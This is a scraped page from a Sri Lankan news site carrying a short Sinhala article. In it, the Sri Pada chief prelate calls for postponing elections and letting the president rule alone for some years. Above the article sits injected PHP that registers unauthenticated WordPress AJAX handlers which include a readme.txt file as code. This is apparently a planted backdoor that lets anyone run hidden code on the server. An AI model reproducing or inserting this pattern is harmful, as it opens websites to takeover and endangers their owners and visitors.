if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මැතිවරණයක් එපා.. වසර කිහිපයක් ජනපති පමනක් රට පාලනය කරන්න..- ශ‍්‍රීපාදස්ථානාධිපති නාහිමියෝ ඉල්ලති.. - mediahumanrights.lk
mediahumanrights.lk
Local News News

මැතිවරණයක් එපා.. වසර කිහිපයක් ජනපති පමනක් රට පාලනය කරන්න..- ශ‍්‍රීපාදස්ථානාධිපති නාහිමියෝ ඉල්ලති..

මේ මොහොත් මැතිවරණයක් පැවැත්වීමට කටයුතු කලහොත් මෙරට ධනය තවත් විශාල වශයෙන් වැය වනු ඇති බව ශ්‍රී පාදස්ථානාධිපති පූජ්‍ය බෙංගමුවේ ධම්මදින්න නාහිමියෝ සඳහන් කරති.

එනිසා ඉදිරියේදී පැවැත්වීමට නියමිත මැතිවරණය කල් දමන ලෙස යෝජනා කරන බවද උන්වහන්සේ පැවසූහ.

මේ පවතින ක්‍රමයට ජනාධිපතිවරයා විසින් තවත් වසර කිහිපයක් රට පාලනය කළ හොත් සියලු දෙනාටම යහපතක් සැලසෙනු ඇතැයිද උන්වහන්සේ සඳහන් කළහ.

මාධ්‍යවේදීන් අමතමින් උන් වහන්සේ මේ අදහස් පල කරන ලදී.
(under the courtesy of lankacnews.com news web)

Related posts

ජනතාවට පටි තද කරන්නැයි කියන ගමන් ආණ්ඩුවෙන් ක්‍රිකට් පිටියක් හදනවානම් ඒක අතිශයින්ම වැරදියි..

Shiran Viraj

Is climbing still just a fitness sport or an approach to life?

Shiran Viraj

ත්‍රිරෝද රථ ලියාපදිංචිය අඩුවීමක්-පොදු ප්‍රවාහනයේ සීඝ්‍ර වර්ධනයක්

Shiran Viraj